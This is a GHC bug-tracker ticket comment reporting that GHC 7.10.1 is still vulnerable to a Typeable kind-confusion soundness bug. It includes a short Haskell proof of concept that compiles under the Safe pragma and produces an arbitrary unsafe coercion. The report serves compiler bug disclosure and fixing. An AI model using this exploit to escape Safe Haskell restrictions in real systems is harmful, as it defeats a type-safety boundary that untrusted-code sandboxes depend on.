
#9858: Typeable instances should be kind-aware -------------------------------------+------------------------------------- Reporter: dreixel | Owner: Type: bug | Status: new Priority: highest | Milestone: 7.12.1 Component: Compiler | Version: 7.9 Resolution: | Keywords: Operating System: Unknown/Multiple | Architecture: Type of failure: None/Unknown | Unknown/Multiple Blocked By: | Test Case: Related Tickets: | Blocking: | Differential Revisions: Phab:D652 -------------------------------------+------------------------------------- Changes (by oerjan): * priority: normal => highest Comment: Sorry, but GHC 7.10.1 is still vulnerable. {{{ -- This exploit still works in GHC 7.10.1. -- By Shachaf Ben-Kiki, Ørjan Johansen and Nathan van Doorn {-# LANGUAGE Safe #-} {-# LANGUAGE TypeFamilies #-} {-# LANGUAGE ConstraintKinds #-} {-# LANGUAGE ImpredicativeTypes #-} import Data.Typeable type E = (:~:) type PX = Proxy (((),()) => ()) type PY = Proxy (() -> () -> ()) data family F p a b newtype instance F a b PX = ID (a -> a) newtype instance F a b PY = UC (a -> b) {-# NOINLINE ecast #-} ecast :: E p q -> f p -> f q ecast Refl = id supercast :: F a b PX -> F a b PY supercast = case cast e of Just e' -> ecast e' where e = Refl e :: E PX PX uc :: a -> b uc = case supercast (ID id) of UC f -> f }}} -- Ticket URL: http://ghc.haskell.org/trac/ghc/ticket/9858#comment:76 GHC http://www.haskell.org/ghc/ The Glasgow Haskell Compiler